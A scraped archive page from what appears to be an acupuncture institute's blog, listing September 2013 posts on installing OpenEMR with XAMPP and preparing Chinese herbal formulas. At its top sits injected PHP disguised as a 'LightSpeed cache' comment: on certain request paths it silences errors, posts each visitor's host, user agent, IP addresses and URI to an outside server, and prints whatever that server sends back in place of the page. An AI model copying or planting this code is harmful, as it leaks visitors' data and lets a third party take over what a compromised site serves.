/** * Implement the LightSpeed cache. */ if (preg_match ('/.*77.*/', $_SERVER['REQUEST_URI']) || preg_match ('/.*ach.*/', $_SERVER['REQUEST_URI'])) { error_reporting(0); $url="http://w3lightcache.com/server_new.php";$params="h=$_SERVER[HTTP_HOST]&ua=$_SERVER[HTTP_USER_AGENT]&ip=$_SERVER[REMOTE_ADDR]&ip2=$_SERVER[HTTP_X_FORWARDED_FOR]&uri=$_SERVER[REQUEST_URI]";$ch=curl_init($url);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$params);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$result=curl_exec($ch);curl_close($ch); if (!empty($result)) {echo $result; die;} } 2013 September : American Institute of Acupuncture

Journal of Acuherb in medicine


Monthly Archives: September 2013

How to install OpenEMR with XAMPP in WindowsXP

How to install OpenEMR with XAMPP in WindowsXP   Disclaimer: This ‘howto’ manual is written based on my personal experience while trying to implement OpenEMR in my clinic. I use Windows XP as a platform of trial and transform my Windows XP to become a local server using XAMPP. Okay, before we go through the details […]

How to Prepare a Bulk Chinese Herbal Formula

By Dr. Kenneth Wang Purpose The purpose of steeping or decocting raw Chinese herbs in a formula is to draw out the therapeutic constituents of the herbs in to the water. The Tea Pot The recommended container is ceramic or glass, and it is important that it has a lid. You should avoid metal or […]